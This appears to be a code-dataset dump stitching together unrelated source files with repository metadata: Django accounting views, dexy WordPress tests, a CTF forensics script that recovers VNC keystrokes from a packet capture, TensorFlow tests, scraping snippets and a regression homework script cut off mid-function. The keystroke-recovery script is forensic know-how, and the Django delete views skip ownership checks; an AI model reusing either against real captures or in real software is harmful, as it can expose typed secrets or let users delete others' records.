if product_form.is_valid():
new_product = product_form.save(commit=False)
new_product.user = request.user
new_product.save()
return _next_page(new_product)
else:
product_form = forms.ProductForm(instance=product_instance)
return render(request, 'accounting/product_edit.html', {
'product_form': product_form,
'instance': product_instance,
})
@login_required
def purchase_product(request):
"""First purchase step.
Select the product from historical purchases or load a new product.
"""
products = Product.objects.filter(user=request.user)
categories = Category.objects.prefetch_related(Prefetch('products', queryset=products))
if products.exists():
response = render(request, 'accounting/purchase_product.html', {
'categories': categories,
})
else:
# edit redirect response to use new product in a purchase
response = redirect('product_new')
response['Location'] += '?next=purchase'
return response
@login_required
def purchase_detail(request, product_pk, purchase_pk=None):
"""Second purchase step.
Ask user for purchase information.
"""
product = get_object_or_404(Product, pk=product_pk, user=request.user)
purchase_instance = None
if purchase_pk:
purchase_instance = get_object_or_404(Purchase, pk=purchase_pk, product=product)
if request.method == 'POST':
purchase_form = forms.PurchaseForm(request.POST, instance=purchase_instance)
if purchase_form.is_valid():
new_purchase = purchase_form.save(commit=False)
new_purchase.user = request.user
new_purchase.product = product
new_purchase.save()
return redirect('purchase_list')
else:
purchase_form = forms.PurchaseForm(instance=purchase_instance)
return render(request, 'accounting/purchase_detail.html', {
'purchase_form': purchase_form,
'product': product,
'purchase_instance': purchase_instance,
})
@login_required
def purchase_delete(request, purchase_pk):
purchase = get_object_or_404(Purchase, pk=purchase_pk)
purchase.delete()
return redirect('purchase_list')
@login_required
def sales_list(request):
"""Show user's sales list."""
from_date, to_date, dates_form = dates_form_processor(request)
sales = request.user.sales.filter(date__range=(from_date, to_date))
return render(request, 'accounting/sales_list.html', {
'sales': sales,
'from_date': from_date,
'to_date': to_date,
'dates_form': dates_form,
'datepicker_fields_ids': ['id_from_date', 'id_to_date'],
})
@login_required
def sale_new(request, sale_pk=None):
"""Save a new sale on the database."""
if sale_pk:
sale_instance = get_object_or_404(Sale, pk=sale_pk)
else:
sale_instance = None
if request.method == 'POST':
sale_form = forms.SaleForm(request.POST, instance=sale_instance)
if sale_form.is_valid():
new_sale = sale_form.save(commit=False)
new_sale.user = request.user
new_sale.save()
return redirect('sales_list')
else:
sale_form = forms.SaleForm(instance=sale_instance)
return render(request, 'accounting/sale_new.html', {
'sale_form': sale_form,
'sale_instance': sale_instance,
})
@login_required
def sale_delete(request, sale_pk):
sale = get_object_or_404(Sale, pk=sale_pk)
sale.delete()
return redirect('sales_list')
| [
"[email protected]"
] | |
c2d6f67753d23b501788801fb5ddc9bf1b830795 | 6cf46f85debb1b0505c0edcbc7296f50a44a615d | /dexy/tests/plugins/test_wordpress_filters.py | 59635a82d9934c4853b96ef03431438d88b9812a | [
"MIT"
] | permissive | aioupload/dexy | 27b7f5051417093d8336e39d71e824b3ef5c9f56 | 350b7ed23d2f3aab50097aabf3481229d75d1cf7 | refs/heads/master | 2021-01-16T22:59:11.707350 | 2013-08-05T06:08:00 | 2013-08-05T06:08:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,062 | py | from dexy.doc import Doc
from dexy.tests.utils import TEST_DATA_DIR
from dexy.tests.utils import wrap
from dexy.tests.utils import capture_stdout
from mock import patch
import dexy.exceptions
import json
import os
import shutil
import dexy.filter
import dexy.wrapper
def test_docmd_create_keyfile():
with wrap():
assert not os.path.exists(".dexyapis")
dexy.filter.Filter.create_instance("wp").docmd_create_keyfile()
assert os.path.exists(".dexyapis")
def test_docmd_create_keyfile_if_exists():
with wrap():
with open(".dexyapis", "w") as f:
f.write("{}")
assert os.path.exists(".dexyapis")
try:
dexy.filter.Filter.create_instance("wp").docmd_create_keyfile()
assert False, ' should raise exception'
except dexy.exceptions.UserFeedback as e:
assert ".dexyapis already exists" in e.message
def test_api_url_with_php_ending():
with wrap():
with open(".dexyapis", "wb") as f:
json.dump({
"wordpress" : {"url" : "http://example.com/api/xmlrpc.php"}
}, f)
url = dexy.filter.Filter.create_instance("wp").api_url()
assert url == "http://example.com/api/xmlrpc.php"
def test_api_url_without_php_ending():
with wrap():
with open(".dexyapis", "wb") as f:
json.dump({ "wordpress" : {"url" : "http://example.com/api"} }, f)
url = dexy.filter.Filter.create_instance("wp").api_url()
assert url == "http://example.com/api/xmlrpc.php"
def test_api_url_without_php_ending_with_trailing_slash():
with wrap():
with open(".dexyapis", "wb") as f:
json.dump({ "wordpress" : {"url" : "http://example.com/api/"} }, f)
url = dexy.filter.Filter.create_instance("wp").api_url()
assert url == "http://example.com/api/xmlrpc.php"
def test_wordpress_without_doc_config_file():
with wrap() as wrapper:
wrapper.debug = False
doc = Doc("hello.txt|wp",
contents = "hello, this is a blog post",
wrapper=wrapper
)
wrapper.run_docs(doc)
assert wrapper.state == 'error'
def mk_wp_doc(wrapper):
doc = Doc("hello.txt|wp",
contents = "hello, this is a blog post",
dirty = True,
wrapper=wrapper
)
for d in doc.datas():
d.setup()
return doc
ATTRS = {
'return_value.metaWeblog.newPost.return_value' : 42,
'return_value.metaWeblog.getPost.return_value' : {
'permaLink' : 'http://example.com/blog/42'
},
'return_value.wp.getCategories.return_value' : [
{ 'categoryName' : 'foo' },
{ 'categoryName' : 'bar' }
],
'return_value.wp.uploadFile.return_value' : {
'url' : 'http://example.com/example.pdf'
}
}
@patch('xmlrpclib.ServerProxy', **ATTRS)
def test_wordpress(MockXmlrpclib):
with wrap():
with open("wordpress.json", "wb") as f:
json.dump({}, f)
with open(".dexyapis", "wb") as f:
json.dump({
'wordpress' : {
'url' : 'http://example.com',
'username' : 'foo',
'password' : 'bar'
}}, f)
# Create new (unpublished) draft
wrapper = dexy.wrapper.Wrapper()
doc = mk_wp_doc(wrapper)
wrapper.run_docs(doc)
with open("wordpress.json", "rb") as f:
result = json.load(f)
assert result['postid'] == 42
assert result['publish'] == False
# Update existing draft
wrapper = dexy.wrapper.Wrapper()
doc = mk_wp_doc(wrapper)
wrapper.run_docs(doc)
assert doc.output_data().json_as_dict().keys() == ['permaLink']
result['publish'] = True
with open("wordpress.json", "wb") as f:
json.dump(result, f)
# Publish existing draft
wrapper = dexy.wrapper.Wrapper()
doc = mk_wp_doc(wrapper)
wrapper.run_docs(doc)
assert "http://example.com/blog/42" in str(doc.output_data())
# Now, separately, test an image upload.
orig = os.path.join(TEST_DATA_DIR, 'color-graph.pdf')
shutil.copyfile(orig, 'example.pdf')
from dexy.wrapper import Wrapper
wrapper = Wrapper()
doc = Doc("example.pdf|wp",
wrapper=wrapper)
with open(".dexyapis", "wb") as f:
json.dump({
'wordpress' : {
'url' : 'http://example.com',
'username' : 'foo',
'password' : 'bar'
}}, f)
wrapper.run_docs(doc)
assert doc.output_data().as_text() == "http://example.com/example.pdf"
# test list categories
with capture_stdout() as stdout:
dexy.filter.Filter.create_instance("wp").docmd_list_categories()
assert stdout.getvalue() == "categoryName\nfoo\nbar\n"
| [
"[email protected]"
] | |
179136706a176c379e4e834a4aa983bf7e7f6ac6 | 421f42acd37d3d02dda23bad4bc68cc58b481c00 | /forensics/ekoparty-vnc/getvnckeys.py | 0656a55d4ed0be982b14ead90bf9394e324d41a2 | [] | no_license | sourcekris/ctf-solutions | 6963d0a1524c4d5bd738d187e72f571bf608bd7a | 3251f113c3a94732e432885fc785fb71d67d05e8 | refs/heads/master | 2021-08-27T18:13:00.902502 | 2021-08-25T07:59:46 | 2021-08-25T07:59:46 | 38,923,614 | 5 | 6 | null | null | null | null | UTF-8 | Python | false | false | 1,048 | py | #!/usr/bin/python
#
# Extract the VNC keystrokes from a PCAP using tshark
#
# kris, Capture The Swag
#
# http://github.com/sourcekris/
#
import subprocess
import sys
import os
import re
if len(sys.argv) < 2:
print "Usage: " + sys.argv[0] + " <pcap or pcapng>"
sys.exit(-1)
# read the tshark data in PDML format - hope its not huge
DEVNULL = open(os.devnull,'w')
print "[+] Reading pcap file: " + sys.argv[1]
pdmllines = subprocess.check_output(['tshark','-r',sys.argv[1],'-Tpdml'],stderr=DEVNULL).splitlines()
message = []
keydown = False
for line in pdmllines:
if 'name="vnc.key_down"' in line and 'showname="Key down: Yes"' in line:
keydown = True
elif 'name="vnc.key_down"' in line and 'showname="Key down: No"' in line:
keydown = False
elif keydown and 'name="vnc.key"' in line and 'showname="Key: ' in line:
keyval = re.sub(r'[^a-f0-9]','',line.split('value=')[1])[-2:]
try:
chr(int(keyval,16)).decode('ascii')
except:
pass
else:
message.append(chr(int(keyval,16)))
print "[+] Message: " + "".join(message)
| [
"[email protected]"
] | |
4357960f8e003e9c912bd7ac3fd0ed1852c7932b | 169e75df163bb311198562d286d37aad14677101 | /tensorflow/tensorflow/contrib/autograph/utils/builtins_test.py | 0c2312178a921037fa419818bf309d671c33914d | [
"Apache-2.0"
] | permissive | zylo117/tensorflow-gpu-macosx | e553d17b769c67dfda0440df8ac1314405e4a10a | 181bc2b37aa8a3eeb11a942d8f330b04abc804b3 | refs/heads/master | 2022-10-19T21:35:18.148271 | 2020-10-15T02:33:20 | 2020-10-15T02:33:20 | 134,240,831 | 116 | 26 | Apache-2.0 | 2022-10-04T23:36:22 | 2018-05-21T08:29:12 | C++ | UTF-8 | Python | false | false | 4,569 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for builtins module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import six
from tensorflow.contrib.autograph.utils import builtins
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.platform import test
class BuiltinsTest(test.TestCase):
def test_dynamic_len_tf_scalar(self):
a = constant_op.constant(1)
with self.assertRaises(ValueError):
with self.test_session() as sess:
sess.run(builtins.dynamic_builtin(len, a))
def test_dynamic_len_tf_array(self):
a = constant_op.constant([1, 2, 3])
with self.test_session() as sess:
self.assertEqual(3, sess.run(builtins.dynamic_builtin(len, a)))
def test_dynamic_len_tf_matrix(self):
a = constant_op.constant([[1, 2], [3, 4]])
with self.test_session() as sess:
self.assertEqual(2, sess.run(builtins.dynamic_builtin(len, a)))
def test_dynamic_len_py_list(self):
a = [3] * 5
self.assertEqual(5, builtins.dynamic_builtin(len, a))
def test_dynamic_range_all_python(self):
self.assertListEqual(list(builtins.dynamic_builtin(range, 3)), [0, 1, 2])
self.assertListEqual(list(builtins.dynamic_builtin(range, 1, 3)), [1, 2])
self.assertListEqual(
list(builtins.dynamic_builtin(range, 2, 0, -1)), [2, 1])
def test_dynamic_range_tf(self):
with self.test_session() as sess:
self.assertAllEqual(
sess.run(builtins.dynamic_builtin(range, constant_op.constant(3))),
[0, 1, 2])
self.assertAllEqual(
sess.run(builtins.dynamic_builtin(range, 1, constant_op.constant(3))),
[1, 2])
self.assertAllEqual(
sess.run(
builtins.dynamic_builtin(range, 2, 0, constant_op.constant(-1))),
[2, 1])
def test_dynamic_range_detection(self):
def range(x): # pylint:disable=redefined-builtin
return x
# Functions that just have the names of builtins are rejected.
with self.assertRaises(NotImplementedError):
self.assertEqual(builtins.dynamic_builtin(range, 1), 1)
if six.PY2:
self.assertListEqual(
list(builtins.dynamic_builtin(xrange, 3)), [0, 1, 2])
self.assertListEqual(
list(builtins.dynamic_builtin(six.moves.range, 3)), [0, 1, 2])
self.assertListEqual(
list(builtins.dynamic_builtin(six.moves.xrange, 3)), [0, 1, 2])
def test_casts(self):
i = constant_op.constant(2, dtype=dtypes.int32)
f = constant_op.constant(1.0, dtype=dtypes.float32)
self.assertEqual(builtins.dynamic_builtin(int, i).dtype, dtypes.int32)
self.assertEqual(builtins.dynamic_builtin(int, f).dtype, dtypes.int32)
self.assertEqual(builtins.dynamic_builtin(float, i).dtype, dtypes.float32)
self.assertEqual(builtins.dynamic_builtin(float, f).dtype, dtypes.float32)
self.assertEqual(builtins.dynamic_builtin(int, True), 1)
self.assertEqual(builtins.dynamic_builtin(int, False), 0)
self.assertEqual(builtins.dynamic_builtin(float, True), 1.0)
self.assertEqual(builtins.dynamic_builtin(float, False), 0.0)
def test_dynamic_print_tf(self):
try:
out_capturer = six.StringIO()
sys.stdout = out_capturer
with self.test_session() as sess:
sess.run(builtins.dynamic_print('test message', 1))
self.assertEqual(out_capturer.getvalue(), 'test message 1\n')
finally:
sys.stdout = sys.__stdout__
def test_dynamic_print_complex(self):
try:
out_capturer = six.StringIO()
sys.stdout = out_capturer
with self.test_session() as sess:
sess.run(builtins.dynamic_print('test message', [1, 2]))
self.assertEqual(out_capturer.getvalue(), 'test message [1, 2]\n')
finally:
sys.stdout = sys.__stdout__
if __name__ == '__main__':
test.main()
| [
"[email protected]"
] | |
c8e05da4b1e368920092b454e82ee0183422509a | 0c6b47f5647fa048e701c743bd61e05667b3b569 | /101_Common_Dialogs/SingleChoiceDialog/__demo__.py | 3556b9bda73bf996e3b30c39c0042e5e6c1cfb11 | [] | no_license | pythonthings/wxPython-Sample-Apps-and-Demos | bbfa5c307c08bd0e732083a7e7ec0aaefa234033 | 65e6828e92217445367420c9c2ebb4a7ed9a1d6e | refs/heads/master | 2022-10-02T18:41:01.697132 | 2020-06-10T00:18:15 | 2020-06-10T00:18:15 | 281,526,555 | 1 | 0 | null | 2020-07-21T23:32:51 | 2020-07-21T23:32:51 | null | UTF-8 | Python | false | false | 2,243 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#-MetaData --------------------------------------------------------------------
__doc__ = """
This module contains the meta data needed for integrating the samples
in the directory into the wxPython demo framework. Once imported,
this module returns the following information:
* GetDemoBitmap: returns the bitmap used in the wxPython tree control
to characterize the package;
* GetDemos: returns all the demos in the package;
* GetOverview: returns a wx.html-ready representation of the package's docs.
These meta data are merged into the wxPython demo tree at startup.
Last updated: User's Name @ 08 Aug 20xx, 21.00 GMT.
Version 0.0.1
"""
__version__ = "0.0.1"
__author__ = "wxPython Team"
#-Imports----------------------------------------------------------------------
#--wxPython Imports.
import wx
from wx.lib.embeddedimage import PyEmbeddedImage
def GetDemoBitmap():
"""
Returns the bitmap to be used for the demo tree item's bitmap.
"""
# Get the image as PyEmbeddedImage
image = dialog16 = PyEmbeddedImage(
"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABHNCSVQICAgIfAhkiAAAAKRJ"
"REFUeJytk0EOwjAMBGdRH+DvVOJVqLfCBZVbxadaJc8yB5RCSguEMhdLK3uzshWZGVuomkPj"
"vw73114VQHtqkS5fD7q3SMLM2AFFw/P+KjmWIh0B7gkScYxFFYDu3Lm7exhCUQXczB4GpSYv"
"Bn9J8AwwNS/pyWBa4tKC6n29qmdnTKKk7FRxjKt6Ikvg7oQhTDUlWNKzBPMXStDW37j73PKe"
"G2AyEYLJPQvVAAAAAElFTkSuQmCC")
# Return the bitmap to use in the wxPython demo tree control.
return image
def GetDemos():
"""
Returns all the demo names in the package, together with the
tree item name which will go in the wxPython demo tree control.
"""
# The tree item text.
TreeItemText = "SingleChoiceDialog"
# The tree item's demos.
TreeItemDemos = (
'SingleChoiceDialog_extended.py',
'SingleChoiceDialog_minimal.py',
)
return TreeItemText, TreeItemDemos
def GetOverview():
"""
Creates the wxHTML code to display on the tree item's Overview tab.
"""
wxHtmlOverviewStr = '''\
<html><body>
<center><h2>SingleChoiceDialog</h2></center>
<p>SingleChoiceDialog demos.
</body></html>
'''
return wxHtmlOverviewStr
| [
"[email protected]"
] | |
604e26e48551410e05524b6f2d4cec5c440f5fbf | ff1137a7d8f9c01632cf757495e065ec5e3817a2 | /爬虫精进/第9关/第9关 selenium提取网页源代码后用bs解析.py | 900588bc680a8a8384ae9a8b2ae68d504b017129 | [] | no_license | yuqiuming2000/Python-code | 3d5e5d8ba5c5f477b4cfab67b0d63d838eefc591 | b16a6c425d4bf400df6b365d091f56bc8c5c4d34 | refs/heads/master | 2023-06-22T04:22:25.991172 | 2021-07-24T13:49:38 | 2021-07-24T13:49:38 | 389,100,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | from selenium import webdriver #从selenium库中调用webdriver模块
import time
from bs4 import BeautifulSoup
driver = webdriver.Chrome() # 设置引擎为Chrome,真实地打开一个Chrome浏览器
driver.get('https://localprod.pandateacher.com/python-manuscript/hello-spiderman/') # 访问页面
time.sleep(2) # 等待2秒
page_source=driver.page_source
print(page_source)
bs=BeautifulSoup(page_source,'html.parser')
labels=bs.find_all('label')
# print(type(labels)) # 打印labels的数据类型
for i in labels:
print(i.text)
driver.close() # 关闭浏览器 | [
"[email protected]"
] | |
317167f3c7c18125e0cf23dbcaad084d793b878d | 01fa2aca31eb73a559d192fd29e44350f26a13a9 | /HAX/18.CocoJoe/script.module.lambdascrapers/lib/lambdascrapers/sources_quick/unchecked/putlockersio.py | 66419b703d52903a2d204fa04395dc04459b9fd2 | [
"Beerware"
] | permissive | RandomIntermition/k4y108837s | b4beedeff375645bd4fa9ad348631a9a9f3640b6 | e9115aad49795dfe30a96c278cedaf089abcc11d | refs/heads/master | 2022-05-01T18:45:57.298903 | 2022-03-30T03:41:08 | 2022-03-30T03:41:08 | 109,356,425 | 1 | 0 | null | 2019-11-08T02:20:47 | 2017-11-03T05:36:48 | Python | UTF-8 | Python | false | false | 1,662 | py | # -*- coding: UTF-8 -*-
# -Cleaned and Checked on 10-16-2019 by JewBMX in Scrubs.
import re
from resources.lib.modules import client
from resources.lib.modules import cleantitle
from resources.lib.modules import more_sources
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['putlockers.io']
self.base_link = 'https://putlockers.io'
def movie(self, imdb, title, localtitle, aliases, year):
try:
mTitle = cleantitle.geturl(title)
url = self.base_link + '/movies/' + mTitle
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = cleantitle.geturl(tvshowtitle)
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if not url:
return
url = self.base_link + '/episodes/' + url + '-' + season + 'x' + episode
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None:
return sources
page = client.request(url)
links = re.compile('<iframe.+?src="(.+?)"', re.DOTALL).findall(page)
for link in links:
for source in more_sources.getMore(link, hostDict):
sources.append(source)
return sources
except:
return sources
def resolve(self, url):
return url
| [
"[email protected]"
] | |
7cc3e50af6a48ca74abfc02656c9019972018641 | 499fc7e223551d434582417353203ecd53b7d731 | /DataTypeandManipulation/TypeCasting.py | efab449b81a11562cf61c91d04d3c343f363a5ba | [] | no_license | pravinherester/LearnPython | df53045e4b098a9923e7ecbbeffedb75f6c82f81 | 05c06dccd9ac45fc30cf0675f89f0bb2c7db6644 | refs/heads/master | 2023-08-11T10:12:50.494666 | 2021-06-19T04:44:12 | 2021-09-10T01:20:58 | 338,636,734 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 342 | py | num_char=len(input("What is your name"))
print(type(num_char))
new_num_char=str(num_char)
print("After type casting")
print(type(new_num_char))
print("Your name has "+new_num_char+ " characters") # This will not break as the Type of new_num_char is String now
#other
#Guess what will print
print(100+float(100.75))
print(str(100)+str(100)) | [
"[email protected]"
] | |
edd2eb581d44ecbc4d3ec57ebcfa7c00cca0f24f | 9dab93d895d0f496452d91b9e0eba365a7c547f2 | /hw7/problem1.py | a4e32c1622ee8bb0a5d8cbfafabb6e02061a2493 | [] | no_license | codeAligned/CS156 | 8d758175f29015338b4f179f24962847b54e6bce | 25012963985ab325bbd4bdc8a9eba914259a5249 | refs/heads/master | 2020-05-17T20:54:51.935297 | 2014-11-12T05:01:36 | 2014-11-12T05:01:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,438 | py | import random
import math
import numpy as np
from numpy.linalg import *
from numpy.matlib import *
import matplotlib.pyplot as plt
def dotProduct(list1, list2):
assert(len(list1) == len(list2))
result = 0
for i in range(len(list1)):
result += (list1[i] * list2[i])
return result
def generatePoint():
x = random.uniform(-1,1)
y = random.uniform(-1,1)
return (x,y)
def sign(value):
if (value >= 0.0):
return 1.0
else:
return -1.0
# returns False if we have a missclassifed points
def checkMisclassified(points, weights, results):
for i in range(len(points)):
result = sign(dotProduct(weights, list(points[i])))
if (result != results[i]):
return False
return True
# don't use regularization!
def linearRegression(points, results):
X = array(points)
#print X
XTrans = X.transpose()
#print XTrans
xTransTimesX = np.dot(XTrans, X)
#print xTransTimesX
#print xTransTimesX.shape[0]
#k = 1 / float(len(points))
k = .01
#print k
#print k * np.identity(xTransTimesX.shape[0])
Z = xTransTimesX# + k * np.identity(xTransTimesX.shape[0])
inverse = inv(Z)
#print inverse
Y = array(results)
#print Y
w = np.dot(np.dot(inverse, XTrans), Y)
#print w
return w
def calcEin(points, results, weights):
assert len(points) == len(results)
#print points
counter = 0
for i in range(len(points)):
point = points[i]
result = results[i]
sumWeights = 0.0
for j in range(len(weights)):
#print point
#print weights
sumWeights += (weights[j] * point[j])
#print sumWeights
if sign(sumWeights) != result:
#print "MISS"
counter += 1
#print "Count: ", counter
#print "POINTS: ", len(points)
return counter / float(len(points))
def regression(N):
(x1,y1) = generatePoint()
(x2,y2) = generatePoint()
rise = y2 - y1
run = x2 - x1
slope = rise / run
# y = mx + b
#b = y - mx
b = y1 - slope * x1
# Now, we have y = (slope) * x + b
#print "y = ", slope, "x + ", b
#xvalues = range(N)
#yvalues = range(N)
points = range(N)
for i in range(N):
(x,y) = generatePoint()
points[i] = ((1, x,y))
#xvalues[i] = x
#yvalues[i] = y
results = range(N)
for j in range(N):
point = points[j]
x = point[1]
y = point[2]
yVal = slope * x + b
if (y > yVal):
results[j] = 1
else:
results[j] = -1
xPos = range(N)
# start weights at all 0
#weights = [0,0,0]
X = array(points)
#print "X"
#print X
XTrans = X.transpose()
#print "X TRANPOSE"
#print XTrans
xTransTimesX = np.dot(XTrans, X)
#xTransTimesX = xTrans * xiiii
#print "XT x X"
#print xTransTimesX
inverse = inv(xTransTimesX)
#print "Inverse"
#print inverse
Y = array(results)
w = dot(dot(inverse, XTrans), Y)
hypSlope = -1 * w[1] / w[2]
hypIntercept = -1 * w[0] / w[2]
s = arange(-1, 1.5, 0.5)
"""
t = arange(-1, 1.5, 0.5)
plt.plot(t, b + slope * t, 'bs-', s, hypIntercept + hypSlope * s, 'gs-', xvalues, yvalues, ':rs')
plt.axis( [-1, 1, -1, 1])
plt.show()
"""
# see how many missclassified points we have
Ein = dot(X,w)
for i in range(N):
Ein[i] = sign(Ein[i])
#Ein -= Y
#print "Ein"
#print Ein
count = 0.0
for i in range(N):
#squares += (asscalar(i)^2.0)s
#print asscalar(Ein[i]), " ", results[i]
if asscalar(Ein[i]) != results[i]:
count += 1
result = count / N
outCounter = 0.0
outPoints = range(1000)
outExpected = range(1000)
for i in range(1000):
(x,y) = generatePoint()
outPoints[i] = (1,x,y)
yVal = slope * x + b
if (y > yVal):
outExpected[i] = 1
else:
outExpected[i] = -1
OutArray = array(outPoints)
Xa = []
Ya = []
Xb = []
Yb = []
for i in range(1000):
x = outPoints[i][1]
y = outPoints[i][2]
res = outExpected[i]
if res == 1:
Xa.append(x)
Ya.append(y)
else:
Xb.append(x)
Yb.append(y)
#Xa[i] = x
#Ya[i] = y
"""
t = arange(-1, 1.5, 0.5)
plt.plot(t, b + slope * t, 'bs-', s, hypIntercept + hypSlope * s, 'gs-', Xa, Ya, ':rs', Xb, Yb, ":bs")
plt.axis( [-1, 1, -1, 1])
plt.show()
"""
Xc = []
Yc = []
Xd = []
Yd = []
EOut = dot(OutArray, w)
#print EOut
#print EOut.size
for i in range(1000):
EOut[i] = sign(EOut[i])
if EOut[i] != outExpected[i]:
outCounter += 1
#print outCounter
outResult = outCounter / 1000
return (result, outResult)
"""
count = 0
converge = 0
#print "LENG: ", len(points)
while True:
# If we have no more misclassified points, we are done
if checkMisclassified(points, weights, results):
break
x = random.randrange(0,N)
point = points[x]
yn = results[x]
#print "YN: " , yn
xn = list(point)
#print xn, type(xn)
#print weights, type(weights)
result = dotProduct(weights, xn)
#print result
#print sign(result)
if (sign(result) != yn):
count += 1
converge = 0
if (yn == 1):
weights[0] += xn[0]
weights[1] += xn[1]
weights[2] += xn[2]
else:
weights[0] -= xn[0]
weights[1] -= xn[1]
weights[2] -= xn[2]
converge += 1
extraPoints = []
for i in range(10000):
(x,y) = generatePoint();
extraPoints.append((1,x,y))
#extraResults = []
miss = 0
for point in extraPoints:
x = point[1]
y = point[2]
yVal = slope * x + b
if (y >= yVal):
answer = 1
#extraResults.append(1)
else:
answer = -1
#extraResults.append(-1)
result = dotProduct(list(point), weights)
if (sign(result) != answer):
miss += 1
#print "MISS: ", miss
return (count, miss)
"""
N = 100
#regression(N)
def calculateA():
points = []
results = []
validationPoints = []
validationResults = []
inputData = open('in.dta', 'r')
counter = 0
for line in inputData:
#print line
counter += 1
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
if counter <= 25:
points.append((1, x1, x2, x1 * x1))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
results.append(float(words[2]))
else:
validationPoints.append((1, x1, x2, x1 * x1))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
validationResults.append(float(words[2]))
inputData.close()
#print points
#print results
weights = linearRegression(points, results)
print "A: use k = 3"
print "W: ", weights
#print validationPoints
#print validationResults
eIn = calcEin(validationPoints, validationResults, weights)
print "Ein: ", eIn
outPoints = []
outResults = []
outData = open('out.dta', 'r')
for line in outData:
#print line
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
outPoints.append((1, x1, x2, x1 * x1))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
outResults.append(float(words[2]))
outData.close()
eOut = calcEin(outPoints, outResults, weights)
print "Eout: ", eOut
def calculateB():
points = []
results = []
validationPoints = []
validationResults = []
inputData = open('in.dta', 'r')
counter = 0
for line in inputData:
#print line
counter += 1
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
if counter <= 25:
points.append((1, x1, x2, x1 * x1, x2 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
results.append(float(words[2]))
else:
validationPoints.append((1, x1, x2, x1 * x1, x2 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
validationResults.append(float(words[2]))
inputData.close()
#print points
#print results
weights = linearRegression(points, results)
print "B: use k = 4"
print "W: ", weights
#print validationPoints
#print validationResults
eIn = calcEin(validationPoints, validationResults, weights)
print "Ein: ", eIn
outPoints = []
outResults = []
outData = open('out.dta', 'r')
for line in outData:
#print line
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
outPoints.append((1, x1, x2, x1 * x1, x2 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
outResults.append(float(words[2]))
outData.close()
eOut = calcEin(outPoints, outResults, weights)
print "Eout: ", eOut
def calculateC():
points = []
results = []
validationPoints = []
validationResults = []
inputData = open('in.dta', 'r')
counter = 0
for line in inputData:
#print line
counter += 1
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
if counter <= 25:
points.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
results.append(float(words[2]))
else:
validationPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
validationResults.append(float(words[2]))
inputData.close()
#print points
#print results
weights = linearRegression(points, results)
print "C: use k = 5"
print "W: ", weights
#print validationPoints
#print validationResults
eIn = calcEin(validationPoints, validationResults, weights)
print "Ein: ", eIn
outPoints = []
outResults = []
outData = open('out.dta', 'r')
for line in outData:
#print line
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
outPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
outResults.append(float(words[2]))
outData.close()
eOut = calcEin(outPoints, outResults, weights)
print "Eout: ", eOut
def calculateD():
points = []
results = []
validationPoints = []
validationResults = []
inputData = open('in.dta', 'r')
counter = 0
for line in inputData:
#print line
counter += 1
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
if counter <= 25:
points.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
results.append(float(words[2]))
else:
validationPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
validationResults.append(float(words[2]))
inputData.close()
#print points
#print results
weights = linearRegression(points, results)
print "D: use k = 6"
print "W: ", weights
#print validationPoints
#print validationResults
eIn = calcEin(validationPoints, validationResults, weights)
print "Ein: ", eIn
outPoints = []
outResults = []
outData = open('out.dta', 'r')
for line in outData:
#print line
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
outPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
outResults.append(float(words[2]))
outData.close()
eOut = calcEin(outPoints, outResults, weights)
print "Eout: ", eOut
def calculateE():
points = []
results = []
validationPoints = []
validationResults = []
inputData = open('in.dta', 'r')
counter = 0
for line in inputData:
#print line
counter += 1
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
if counter <= 25:
